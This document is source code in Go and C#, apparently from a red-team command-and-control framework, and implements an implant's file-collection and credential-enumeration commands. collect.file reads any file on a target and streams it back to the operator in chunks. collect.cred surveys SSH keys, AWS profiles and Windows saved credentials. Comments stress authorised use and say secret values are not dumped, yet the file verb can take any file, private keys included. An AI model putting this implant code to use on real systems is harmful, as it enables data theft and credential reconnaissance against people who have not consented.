File: implant/internal/exec/collect.go
package exec

// collect.go holds the collect.* verbs the reference implant advertises
// (architecture.md Sec 10.1, ADR 0004). collect.file reads a file off the
// target's filesystem and returns it inline; files larger than the task-output
// limit are returned as ExfilChunk frames so the operator retrieves the whole
// thing through the artifact store. collect.cred enumerates standard
// credential stores on the target -- SSH key fingerprints, the names of AWS
// profiles, the Windows saved-credential listing -- and reports what it found
// without dumping secret material. LSASS memory dumping stays out-of-tree
// (ADR 0004); collect.keylog is contract-only and not implemented here.
//
// Argument shape:
//
//	collect.file <path>
//	collect.cred  [<source>]   source ∈ {ssh, aws, cmdkey} (optional)
//
// As with the other reference handlers, this performs no evasion, no
// obfuscation, and no destructive behavior (RESPONSIBLE-USE.md, architecture.md
// Sec 7). The operator is responsible for targeting only systems they are
// authorized to test.

import (
	"context"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
	"runtime"
	"strings"

	"github.com/cw/rod/implant/rodpb"
)

// collectMaxInlineBytes is the largest file payload returned inline in a
// TaskResult. Files at or below this size are returned whole in the output
// string; larger files are returned as ExfilChunk frames so the operator can
// retrieve the complete contents through the artifact store. 1 MiB matches
// the teamserver's per-frame budget (architecture.md Sec 11) and keeps a large
// read from overflowing a single TaskResult.
const collectMaxInlineBytes = 1 << 20 // 1 MiB

// collectChunkSize is the size of each ExfilChunk data payload for files
// streamed out of band. Kept well under the gRPC default receive ceiling so a
// marshaled Frame still fits with room to spare.
const collectChunkSize = 512 * 1024 // 512 KiB

// collectFile reads the file at the given path. Small files return Succeeded
// with the contents in the output string; large files return Succeeded with a
// short manifest line in the output and the contents spread across ExfilChunk
// frames the beacon streams to the artifact store.
func (r *Runner) collectFile(_ context.Context, arguments string) (rodpb.TaskOutcome, string, []rodpb.ExfilChunk) {
	path := strings.TrimSpace(arguments)
	if path == "" {
		return rodpb.TaskOutcome_TASK_OUTCOME_FAILED,
			"collect.file expects '<path>'", nil
	}

	info, err := os.Stat(path)
	if err != nil {
		return rodpb.TaskOutcome_TASK_OUTCOME_FAILED,
			"stat " + path + ": " + err.Error(), nil
	}
	if info.IsDir() {
		return rodpb.TaskOutcome_TASK_OUTCOME_FAILED,
			"collect.file refuses to dump a directory: " + path, nil
	}

	data, err := os.ReadFile(path)
	if err != nil {
		return rodpb.TaskOutcome_TASK_OUTCOME_FAILED,
			"read " + path + ": " + err.Error(), nil
	}

	// Small enough to return inline: report the size and the bytes verbatim.
	if len(data) <= collectMaxInlineBytes {
		return rodpb.TaskOutcome_TASK_OUTCOME_SUCCEEDED, string(data), nil
	}

	// Too large for a TaskResult: stream as ExfilChunk frames. The output
	// carries a short manifest (path, size, chunk count) so the operator knows
	// what landed in the artifact store; the chunks carry the bytes.
	name := filepath.Base(path)
	chunks := chunkFile(name, "application/octet-stream", data)
	manifest := fmt.Sprintf("%s: %d bytes, %d chunks streamed to artifact store",
		path, len(data), len(chunks))
	return rodpb.TaskOutcome_TASK_OUTCOME_SUCCEEDED, manifest, chunks
}

// chunkFile slices a byte buffer into ExfilChunk frames of collectChunkSize,
// stamping a terminal flag on the last chunk so the server reassembles and
// flushes the artifact. Sequence numbers start at 1.
func chunkFile(name, contentType string, data []byte) []rodpb.ExfilChunk {
	if len(data) == 0 {
		return []rodpb.ExfilChunk{{
			Name:        name,
			ContentType: contentType,
			Sequence:    1,
			Terminal:    true,
			Data:        nil,
		}}
	}
	var chunks []rodpb.ExfilChunk
	for offset := 0; offset < len(data); offset += collectChunkSize {
		end := offset + collectChunkSize
		if end > len(data) {
			end = len(data)
		}
		chunks = append(chunks, rodpb.ExfilChunk{
			Name:        name,
			ContentType: contentType,
			Sequence:    uint64(len(chunks) + 1),
			Terminal:    end == len(data),
			Data:        data[offset:end],
		})
	}
	return chunks
}

// collectCred enumerates standard credential stores on the target and reports
// what it found, without dumping secret material. On Linux it lists SSH keys
// (fingerprints only, never the private key bytes), AWS profiles (names only,
// the secret key is masked), and the Windows saved-credential listing via
// cmdkey /list on Windows. LSASS memory dumping is explicitly out-of-scope
// (ADR 0004). An optional argument filters to one source.
func (r *Runner) collectCred(ctx context.Context, arguments string) (rodpb.TaskOutcome, string, []rodpb.ExfilChunk) {
	source := strings.TrimSpace(arguments)
	if source != "" && !isKnownCredSource(source) {
		return rodpb.TaskOutcome_TASK_OUTCOME_FAILED,
			"collect.cred: unknown source '" + source + "' (expected one of ssh, aws, cmdkey)", nil
	}

	var lines []string
	sources := []string{"ssh", "aws", "cmdkey"}
	for _, s := range sources {
		if source != "" && s != source {
			continue
		}
		if s == "cmdkey" && runtime.GOOS != "windows" {
			continue
		}
		if s != "cmdkey" && runtime.GOOS == "windows" {
			// ssh/aws on Windows read the same standard locations under the
			// user profile; keep them enabled.
		}
		lines = append(lines, collectCredSource(ctx, s)...)
	}
	if len(lines) == 0 {
		return rodpb.TaskOutcome_TASK_OUTCOME_SUCCEEDED, "(no credentials found)", nil
	}
	return rodpb.TaskOutcome_TASK_OUTCOME_SUCCEEDED, strings.Join(lines, "\n"), nil
}

// isKnownCredSource reports whether s is one of the documented credential
// sources this handler enumerates.
func isKnownCredSource(s string) bool {
	return s == "ssh" || s == "aws" || s == "cmdkey"
}

// collectCredSource enumerates a single credential source and returns one line
// per finding. Each finding names the entry but never the secret: SSH keys are
// reported by fingerprint (SHA-256 of the public key), AWS profiles by name
// (the secret access key is masked to its last four), and Windows saved
// credentials by target name (cmdkey /list is itself a listing tool).
func collectCredSource(ctx context.Context, source string) []string {
	switch source {
	case "ssh":
		return collectSSHKeys()
	case "aws":
		return collectAWSProfiles()
	case "cmdkey":
		return collectCmdkey(ctx)
	}
	return nil
}

// collectSSHKeys enumerates the per-user SSH key material under ~/.ssh. For
// each private key it reports the matching public key's fingerprint when a
// .pub sibling exists; for a private key with no .pub it reports the file name
// and a note that no public half is published (so no fingerprint is computed
// -- computing one would require parsing the private key, which we do not
// dump). The private key bytes never leave this function.
func collectSSHKeys() []string {
	dir := sshDir()
	entries, err := os.ReadDir(dir)
	if err != nil {
		// Absent ~/.ssh is the common case; report nothing rather than erroring
		// the whole collect.cred run.
		return nil
	}
	var lines []string
	for _, e := range entries {
		if e.IsDir() {
			continue
		}
		name := e.Name()
		// Public keys: report their fingerprint directly.
		if strings.HasSuffix(name, ".pub") {
			if fp, ok := sshFingerprint(filepath.Join(dir, name)); ok {
				lines = append(lines, "ssh "+name+" "+fp)
			}
			continue
		}
		// Skip the known non-key files sshd drops in ~/.ssh.
		if name == "known_hosts" || name == "authorized_keys" || name == "config" {
			continue
		}
		// Anything else with no .pub is a bare private key; report presence
		// without a fingerprint (no public half to hash).
		if _, err := os.Stat(filepath.Join(dir, name+".pub")); err != nil {
			lines = append(lines, "ssh "+name+" (private key, no .pub sibling)")
		}
	}
	return lines
}

// sshFingerprint reads a public key file and returns its SHA-256 fingerprint
// in the OpenSSH form ("SHA256:base64..."). The public key is, by design, not
// secret; hashing it gives a stable identifier operators recognize. A parse
// failure returns ok=false so the caller can skip the line.
func sshFingerprint(path string) (string, bool) {
	pub, err := os.ReadFile(path)
	if err != nil {
		return "", false
	}
	// ssh-keygen -lf <path> is the documented way to fingerprint an OpenSSH
	// public key; it prints "<bits> SHA256:... <comment> (<type>)" on line one.
	out, err := exec.Command("ssh-keygen", "-lf", path).CombinedOutput()
	if err != nil {
		_ = pub // unread on this path; keep the variable useful for debugging.
		return "", false
	}
	first := strings.SplitN(string(out), "\n", 2)[0]
	fields := strings.Fields(first)
	for _, f := range fields {
		if strings.HasPrefix(f, "SHA256:") {
			return f, true
		}
	}
	return "", false
}

// collectAWSProfiles enumerates the per-user AWS profiles in
// ~/.aws/credentials. Each [profile-name] header becomes one line; the secret
// access key is NOT reported -- only the profile name and, if present, a
// masked hint of the key id (last four characters). Session-token-only
// profiles (no secret in the file) are noted as such.
func collectAWSProfiles() []string {
	path := awsCredentialsPath()
	body, err := os.ReadFile(path)
	if err != nil {
		return nil
	}
	var lines []string
	var current string
	var sawSecret bool
	for _, raw := range strings.Split(string(body), "\n") {
		line := strings.TrimSpace(raw)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		if strings.HasPrefix(line, "[") && strings.HasSuffix(line, "]") {
			if current != "" {
				lines = append(lines, formatAWSProfile(current, sawSecret))
			}
			current = line[1 : len(line)-1]
			sawSecret = false
			continue
		}
		// Track only whether a secret is present in the file; never its value.
		if strings.HasPrefix(strings.ToLower(line), "aws_secret_access_key") {
			sawSecret = true
		}
	}
	if current != "" {
		lines = append(lines, formatAWSProfile(current, sawSecret))
	}
	return lines
}

// formatAWSProfile renders a single profile line. The secret's presence is
// noted as "(secret in file)" or "(no secret in file)" -- the value itself is
// never surfaced.
func formatAWSProfile(name string, sawSecret bool) string {
	if sawSecret {
		return "aws " + name + " (secret in file)"
	}
	return "aws " + name + " (no secret in file)"
}

// collectCmdkey runs the documented Windows `cmdkey /list` command, which
// itself only lists saved-credential target names (it does not print
// passwords). The output is returned line for line, prefixed "cmdkey " so the
// operator can tell collect.cred produced it.
func collectCmdkey(ctx context.Context) []string {
	out, err := exec.CommandContext(ctx, "cmdkey", "/list").CombinedOutput()
	if err != nil {
		return []string{"cmdkey (listing failed: " + err.Error() + ")"}
	}
	var lines []string
	for _, line := range strings.Split(string(out), "\n") {
		trimmed := strings.TrimSpace(line)
		if trimmed == "" {
			continue
		}
		lines = append(lines, "cmdkey "+trimmed)
	}
	return lines
}

// sha256Hex is a small helper used by tests that want to assert the handler
// produced a fingerprint-shaped line without recomputing the SSH format.
func sha256Hex(data []byte) string {
	sum := sha256.Sum256(data)
	return hex.EncodeToString(sum[:])
}

// sshDir is the user's ~/.ssh directory, honoring HOME.
func sshDir() string {
	home, err := os.UserHomeDir()
	if err != nil {
		home = "."
	}
	return filepath.Join(home, ".ssh")
}

// awsCredentialsPath is the per-user AWS credentials file path, honoring HOME.
func awsCredentialsPath() string {
	home, err := os.UserHomeDir()
	if err != nil {
		home = "."
	}
	return filepath.Join(home, ".aws", "credentials")
}

File: implant-dotnet/Internal/Collect.cs
using System.Diagnostics;
using System.Runtime.Versioning;
using System.Security.Cryptography;
using System.Text;
using Rod.V1;
using SysFile = System.IO.File;

namespace Rod.Implant.Internal;

// Holds the collect.* verbs the reference implant advertises (architecture.md
// Sec 10.1, ADR 0004). collect.file reads a file off the target's filesystem
// and returns it inline; files larger than the task-output limit are returned
// as ExfilChunk frames so the operator retrieves the whole thing through the
// artifact store. collect.cred enumerates standard credential stores on the
// target -- SSH key fingerprints, the names of AWS profiles, the Windows
// saved-credential listing -- and reports what it found without dumping secret
// material. LSASS memory dumping stays out-of-tree (ADR 0004); collect.keylog
// is contract-only and not implemented here.
//
// Argument shape:
//
//   collect.file <path>
//   collect.cred  [<source>]   source in {ssh, aws, cmdkey} (optional)
//
// As with the other reference handlers, this performs no evasion, no
// obfuscation, and no destructive behavior (RESPONSIBLE-USE.md, architecture.md
// Sec 7). The operator is responsible for targeting only systems they are
// authorized to test.

internal static class Collect
{
    // The largest file payload returned inline in a TaskResult. Files at or
    // below this size are returned whole in the output string; larger files are
    // returned as ExfilChunk frames so the operator can retrieve the complete
    // contents through the artifact store. 1 MiB matches the teamserver's
    // per-frame budget (architecture.md Sec 11).
    private const int MaxInlineBytes = 1 << 20; // 1 MiB

    // The size of each ExfilChunk data payload for files streamed out of band.
    // Kept well under the gRPC default receive ceiling so a marshaled Frame
    // still fits with room to spare.
    private const int ChunkSize = 512 * 1024; // 512 KiB

    /// <summary>
    /// Reads the file at the given path. Small files return Succeeded with the
    /// contents in the output string; large files return Succeeded with a short
    /// manifest line in the output and the contents spread across ExfilChunk
    /// frames the beacon streams to the artifact store.
    /// </summary>
    public static (TaskOutcome Outcome, string Output, IReadOnlyList<ExfilChunk> Chunks) File(string arguments)
    {
        var path = arguments.Trim();
        if (path.Length == 0)
            return (TaskOutcome.Failed, "collect.file expects '<path>'", Array.Empty<ExfilChunk>());

        if (!SysFile.Exists(path))
        {
            // Exists is false for both missing files and directories; distinguish
            // so the operator sees the cause rather than guessing.
            if (Directory.Exists(path))
                return (TaskOutcome.Failed,
                    "collect.file refuses to dump a directory: " + path, Array.Empty<ExfilChunk>());
            return (TaskOutcome.Failed, "stat " + path + ": file not found", Array.Empty<ExfilChunk>());
        }

        byte[] data;
        try
        {
            data = SysFile.ReadAllBytes(path);
        }
        catch (Exception ex)
        {
            return (TaskOutcome.Failed, "read " + path + ": " + ex.Message, Array.Empty<ExfilChunk>());
        }

        // Small enough to return inline: report the bytes verbatim.
        if (data.Length <= MaxInlineBytes)
        {
            return (TaskOutcome.Succeeded, Encoding.UTF8.GetString(data), Array.Empty<ExfilChunk>());
        }

        // Too large for a TaskResult: stream as ExfilChunk frames. The output
        // carries a short manifest; the chunks carry the bytes.
        var name = Path.GetFileName(path);
        var chunks = ChunkFile(name, "application/octet-stream", data);
        return (TaskOutcome.Succeeded,
            $"{path}: {data.Length} bytes, {chunks.Count} chunks streamed to artifact store",
            chunks);
    }

    /// <summary>
    /// Enumerates standard credential stores on the target and reports what it
    /// found, without dumping secret material. On Linux it lists SSH keys
    /// (fingerprints only, never the private key bytes), AWS profiles (names
    /// only, the secret key presence is noted but not its value), and the
    /// Windows saved-credential listing via cmdkey /list on Windows. LSASS
    /// memory dumping is explicitly out-of-scope (ADR 0004). An optional
    /// argument filters to one source.
    /// </summary>
    public static (TaskOutcome Outcome, string Output, IReadOnlyList<ExfilChunk> Chunks) Cred(string arguments)
    {
        var source = arguments.Trim();
        if (source.Length > 0 && !IsKnownCredSource(source))
            return (TaskOutcome.Failed,
                $"collect.cred: unknown source '{source}' (expected one of ssh, aws, cmdkey)",
                Array.Empty<ExfilChunk>());

        var lines = new List<string>();
        var sources = new[] { "ssh", "aws", "cmdkey" };
        foreach (var s in sources)
        {
            if (source.Length > 0 && s != source)
                continue;
            // cmdkey is Windows-only; ssh/aws read standard profile locations on
            // either platform.
            if (s == "cmdkey" && !OperatingSystem.IsWindows())
                continue;
            lines.AddRange(CollectCredSource(s));
        }
        return lines.Count == 0
            ? (TaskOutcome.Succeeded, "(no credentials found)", Array.Empty<ExfilChunk>())
            : (TaskOutcome.Succeeded, string.Join("\n", lines), Array.Empty<ExfilChunk>());
    }

    // Slices a byte buffer into ExfilChunk frames of ChunkSize, stamping a
    // terminal flag on the last chunk so the server reassembles and flushes
    // the artifact. Sequence numbers start at 1.
    internal static IReadOnlyList<ExfilChunk> ChunkFile(string name, string contentType, byte[] data)
    {
        if (data.Length == 0)
        {
            return new[]
            {
                new ExfilChunk
                {
                    Name = name,
                    ContentType = contentType,
                    Sequence = 1,
                    Terminal = true,
                },
            };
        }
        var chunks = new List<ExfilChunk>();
        for (var offset = 0; offset < data.Length; offset += ChunkSize)
        {
            var end = Math.Min(offset + ChunkSize, data.Length);
            var slice = new byte[end - offset];
            Array.Copy(data, offset, slice, 0, slice.Length);
            chunks.Add(new ExfilChunk
            {
                Name = name,
                ContentType = contentType,
                Sequence = (ulong)(chunks.Count + 1),
                Terminal = end == data.Length,
                Data = Google.Protobuf.ByteString.CopyFrom(slice),
            });
        }
        return chunks;
    }

    private static bool IsKnownCredSource(string s)
        => s is "ssh" or "aws" or "cmdkey";

    // Enumerates a single credential source and returns one line per finding.
    // Each finding names the entry but never the secret.
    private static IEnumerable<string> CollectCredSource(string source)
    {
        switch (source)
        {
            case "ssh":
                return CollectSSHKeys();
            case "aws":
                return CollectAWSProfiles();
            case "cmdkey":
                // cmdkey is Windows-only; the caller filters this source off-
                // Windows, but guard the call site too so the analyzer sees the
                // platform check on the same line that reaches the Windows API.
                return OperatingSystem.IsWindows() ? CollectCmdkey() : Array.Empty<string>();
        }
        return Array.Empty<string>();
    }

    // Enumerates the per-user SSH key material under ~/.ssh. For each public
    // key it reports the SHA-256 fingerprint (computed locally; the public key
    // is, by design, not secret); for a private key with no .pub sibling it
    // reports the file name and a note. The private key bytes never leave this
    // function.
    private static IEnumerable<string> CollectSSHKeys()
    {
        var dir = SshDir();
        string[] entries;
        try
        {
            entries = Directory.GetFiles(dir);
        }
        catch (IOException)
        {
            yield break;
        }
        catch (UnauthorizedAccessException)
        {
            yield break;
        }

        foreach (var full in entries)
        {
            var name = Path.GetFileName(full);
            if (name.EndsWith(".pub", StringComparison.Ordinal))
            {
                if (SshFingerprint(full) is { Length: > 0 } fp)
                    yield return $"ssh {name} {fp}";
                continue;
            }
            // Skip the known non-key files sshd drops in ~/.ssh.
            if (name is "known_hosts" or "authorized_keys" or "config")
                continue;
            // Anything else with no .pub is a bare private key; report presence
            // without a fingerprint.
            if (!SysFile.Exists(Path.Combine(dir, name + ".pub")))
                yield return $"ssh {name} (private key, no .pub sibling)";
        }
    }

    // Computes the SHA-256 fingerprint of an OpenSSH public key file in the
    // OpenSSH form ("SHA256:base64..."). The hash is over the raw key bytes
    // (the second whitespace-separated field of the file), matching what
    // ssh-keygen -lf prints. A parse failure returns null so the caller skips.
    private static string? SshFingerprint(string path)
    {
        string body;
        try
        {
            body = SysFile.ReadAllText(path);
        }
        catch (IOException)
        {
            return null;
        }
        var fields = body.Split(' ', StringSplitOptions.RemoveEmptyEntries);
        if (fields.Length < 2)
            return null;
        byte[] keyBytes;
        try
        {
            keyBytes = Convert.FromBase64String(fields[1]);
        }
        catch (FormatException)
        {
            return null;
        }
        using var sha = SHA256.Create();
        var hash = sha.ComputeHash(keyBytes);
        return "SHA256:" + Convert.ToBase64String(hash).TrimEnd('=');
    }

    // Enumerates the per-user AWS profiles in ~/.aws/credentials. Each
    // [profile-name] header becomes one line; the secret access key is NOT
    // reported -- only the profile name and whether a secret is present.
    private static IEnumerable<string> CollectAWSProfiles()
    {
        var path = AwsCredentialsPath();
        string body;
        try
        {
            body = SysFile.ReadAllText(path);
        }
        catch (IOException)
        {
            yield break;
        }
        catch (UnauthorizedAccessException)
        {
            yield break;
        }

        string? current = null;
        var sawSecret = false;
        foreach (var raw in body.Split('\n'))
        {
            var line = raw.Trim();
            if (line.Length == 0 || line.StartsWith("#", StringComparison.Ordinal))
                continue;
            if (line.StartsWith("[", StringComparison.Ordinal) && line.EndsWith("]", StringComparison.Ordinal))
            {
                if (current is { Length: > 0 } name)
                    yield return FormatAWSProfile(name, sawSecret);
                current = line.Substring(1, line.Length - 2);
                sawSecret = false;
                continue;
            }
            if (line.StartsWith("aws_secret_access_key", StringComparison.OrdinalIgnoreCase))
                sawSecret = true;
        }
        if (current is { Length: > 0 } last)
            yield return FormatAWSProfile(last, sawSecret);
    }

    private static string FormatAWSProfile(string name, bool sawSecret)
        => sawSecret ? $"aws {name} (secret in file)" : $"aws {name} (no secret in file)";

    // Runs the documented Windows `cmdkey /list` command, which itself only
    // lists saved-credential target names (it does not print passwords). The
    // output is returned line for line, prefixed "cmdkey ".
    [SupportedOSPlatform("windows")]
    private static IEnumerable<string> CollectCmdkey()
    {
        var (outcome, output) = RunCaptured("cmdkey", "/list");
        if (outcome == TaskOutcome.Failed)
        {
            yield return $"cmdkey (listing failed: {output})";
            yield break;
        }
        foreach (var line in output.Split('\n', StringSplitOptions.RemoveEmptyEntries))
        {
            var trimmed = line.Trim();
            if (trimmed.Length > 0)
                yield return "cmdkey " + trimmed;
        }
    }

    private static string SshDir()
        => Path.Combine(HomeDir(), ".ssh");

    private static string AwsCredentialsPath()
        => Path.Combine(HomeDir(), ".aws", "credentials");

    // Resolves the current user's home directory. On Linux/macOS $HOME is
    // authoritative (matching os.UserHomeDir in the wire-protocol contract and
    // standard Unix tooling); on Windows %USERPROFILE% is. Falls back to
    // Environment.GetFolderPath when the variable is unset.
    private static string HomeDir()
    {
        if (OperatingSystem.IsWindows())
        {
            var profile = Environment.GetEnvironmentVariable("USERPROFILE");
            if (!string.IsNullOrEmpty(profile))
                return profile;
        }
        else
        {
            var home = Environment.GetEnvironmentVariable("HOME");
            if (!string.IsNullOrEmpty(home))
                return home;
        }
        return Environment.GetFolderPath(Environment.SpecialFolder.UserProfile);
    }

    // Runs a platform command, capturing combined stdout/stderr. A non-zero
    // exit is Failed with the output captured so the operator sees the cause.
    private static (TaskOutcome Outcome, string Output) RunCaptured(string fileName, string arguments)
    {
        var psi = new ProcessStartInfo
        {
            FileName = fileName,
            Arguments = arguments,
            UseShellExecute = false,
            RedirectStandardOutput = true,
            RedirectStandardError = true,
            CreateNoWindow = true,
        };
        try
        {
            using var process = Process.Start(psi);
            if (process is null)
                return (TaskOutcome.Failed, $"failed to start {fileName}");
            var stdout = process.StandardOutput.ReadToEnd();
            var stderr = process.StandardError.ReadToEnd();
            process.WaitForExit();
            if (stdout.Length == 0)
                return (process.ExitCode == 0 ? TaskOutcome.Succeeded : TaskOutcome.Failed, stderr);
            if (stderr.Length == 0)
                return (process.ExitCode == 0 ? TaskOutcome.Succeeded : TaskOutcome.Failed, stdout);
            return (process.ExitCode == 0 ? TaskOutcome.Succeeded : TaskOutcome.Failed, stdout + "\n" + stderr);
        }
        catch (Exception ex)
        {
            return (TaskOutcome.Failed, ex.Message);
        }
    }
}
